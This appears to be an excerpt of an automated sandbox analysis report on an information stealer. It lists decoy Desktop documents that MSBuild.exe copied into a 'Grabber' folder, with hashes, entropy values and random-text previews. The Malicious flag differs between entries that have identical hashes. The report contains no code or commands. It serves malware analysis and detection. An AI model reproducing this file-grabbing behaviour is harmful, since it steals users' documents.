Preview:	EEGWXUHVUGUAGDCAESAKQJADEXSKGQOTKSMYVIQMWCXKMREFNGUJHWRPPFJWEQHLMDSTAHLHBQSXLRGVYEPBLZILRXLTPZSELULGEDFWQHJHNIHNCTGEIAAPQHNOFANJGPRIYVQSOFCGDPFBTNYILXIPYTWVOYXFUCEEQWZRPXFERZCPKKZAHOYWHFAYDMSXERUPTEZISMPADRFDIWGTWAXETEOPJYWDNGCDFFZUXZZSPZVIILCQXOFDOGUOSZYPXXVLSNAWWPHQGNSYQXOUOGPFDMDNPFUONUSGUOUKYHHGHFFZYEDSZVDRUEJKGSHEMJARIAEZZDBZJFCMNUJIHQFHGDONGFEZRYCZYIAOXAXGWENMTPOKNMZPJSZVCDZRZPFIIYHXITKZBLAJXANTSBCWIGABZKBTKDJRSTSKYORPMNGHCZWCLOVFPZBMYKBYDRXMFUQJDNWZFCVEOXPGJMBQZRUEOTLHEFHKDZLVFBXLUSXRAXKVLWGOWARAQZHIMTYBWKPLWNJFMLQVXGRMIGEIPZEIFBYZRYNEEZHFMFOGMBEWLJPBXWVYHVEUKSKVKINVMDJKCSAOUXTMIHLOJXLTEKLKJDYABXRPKNGFOXISIFXHABTYQIPUCFNIJWNCTAFGYEIBCCNXPZQAGPHNNRICKSKCXWERLWTFSJWUSCBTVWSYUVWXJQHMSZYHAHYELYFPIBFZETDRPQBQHKMCXRRCAEYFIERXQZVCDZZBPQJJDQUDHKPMDBXPEBPFURYAPUWVWVJRWXHFXQGMVUGOILYXGFSMEFMKLBFACOSIKHHXRBRGYVIVAOTFNIIOQUZTHBZGOGPVUVYSYNHRKOADWYTLCNTHHCZYXXGFCXMFHZBZBCCMTYSROXNAHKABYAXPWRNKHCJYLAMQAUZBVJWHFXISFSKFXGFPDIOTITGPUETUYHRIXQOTIGEVDQWEBJVPDIUZVQFUBWREJIPSNXDGEKXKULZFHZQHQXPMBIYA

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IPKGELNTQY\GAOBCVIQIJ.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IPKGELNTQY\IPKGELNTQY.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\IPKGELNTQY\SUAVTZKNFL.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69422273140364
Encrypted:	false
SSDEEP:	24:hdGRma8y0UOkmVb01yh9qfT+PsSMxto3vIcMhrzxYWSDHtj:hdGRma6bRh9rsFE/uhrOWSDHh
MD5:	A686C2E2230002C3810CB3638589BF01
SHA1:	4B764DD14070E52A2AC0458F401CDD5724E714FB
SHA-256:	38F526D338AC47F7C2CAB7AB654A375C87E51CC56B4FA09A7C5769E2FB472FFC
SHA-512:	1F2AA9D4B55B52C32EF0C88189256562B16DF13EEA0564BD7B47E45CC39279F39823033ADF95BBD9A50B4F35E417E418C4D20BBE14EF425EFF7134ECE05BEB3F
Malicious:	false
Preview:	SUAVTZKNFLPDUIKIPSQJDVGAPGXKDOHYHNOWHLTUYHUBPZNAGHXWSRGELNTTLWSOVKHBKQEKGENMQDFUYQEFPUMFVGFHNHBEYAAJVHSIYLSLGVZSSKYNEFOJGJXPWCGXOBRZVXDWDDKKLDGWVLNCMOJKBSBYFMTKILZOONEGLZWORUNOTXJNOTGXQTUBOXEFHVICNNYYHMRGCLTZLWQODATYJZBGFVEMSABDUIKNKVRGQOHHCSHZAJIYWZLGGZOOEOQBTEAFTXBQJIHRZBDRPFDGHVFGYZEIHFYVBPAXJYSLOTRVHEFEEWXUGJCOLFXEKSPFHBKQEHGPZADNNCAUYCTEDLFKZMZOQOADUCTDIOYKELVKGABHEMOSAYPWUUKTZHQNEQWLFATTPCULHLMBMEQVAXDFQNQLMLVOFTUTWLMJNLVNCRHTWUTJEEORGWISXALHDTNXRCWVMZRUEMSVOJYMENRHGVXXMGLOWYRFKZLPBZQMETPESMZPCJGYXVQSMCJXYEMMNKLPIXGOXOMQNYCFAEVPXDGOFEGSLWKBUOLRKXGTWDFUVGYFTOWQZAOIMQUZEELMCQWKUBEWGFDVXSXNGHPJNVDQHMPSSIFZTQLVBBHZOEGNPDAWAYLIRBWZHXRAXBBESYNRIRINAKLQMELNYRHRPKDBUCNSZOVHNTBCUYDQTGFWZJUCUZBHHXHQHKWOWTEWLUGGGWHIHCWZLLJPDFVDICZBBLFSECTLMQBKCPCHANOICKIUSVAJTYQOIUWRGVAFOFTMIHARUUCNGBLVFIKMTTGPYXNEVGLPMZDMIQDQOLIEFHNZYMZTCDOHBNQLNVLXRUXMGYCVOJDBWPSJKMFMEDBEMXULQBRVRKPYNUACCXNPGFEMPXDXNEIPTKGSKUMVFSLCTJFHNFATCDKSZWKYMVQNTVHCOAJXDUTJZESFLKTQOGREXBTBVBGLDYJYDTNEAQDFRTXMJIHJCCTPUDZLNKNEABFQYCDL

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LSBIHQFDVT.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	false
Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LSBIHQFDVT.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	true
Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN.docx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	true
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\GAOBCVIQIJ.jpg

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.701188456968639
Encrypted:	false
SSDEEP:	24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
MD5:	18A3248DC9C539CCD2C8419D200F1C4D
SHA1:	3B2CEE87F3426C4A08959E9861D274663420215C
SHA-256:	27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
SHA-512:	F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
Malicious:	false
Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\IPKGELNTQY.xlsx

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\4f56288dfbc9a5af15947e7b835589a8\user@960781_en-CH\Grabber\DRIVE-C\Users\user\Desktop\MXPXCVPDVN\LSBIHQFDVT.pdf

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	false
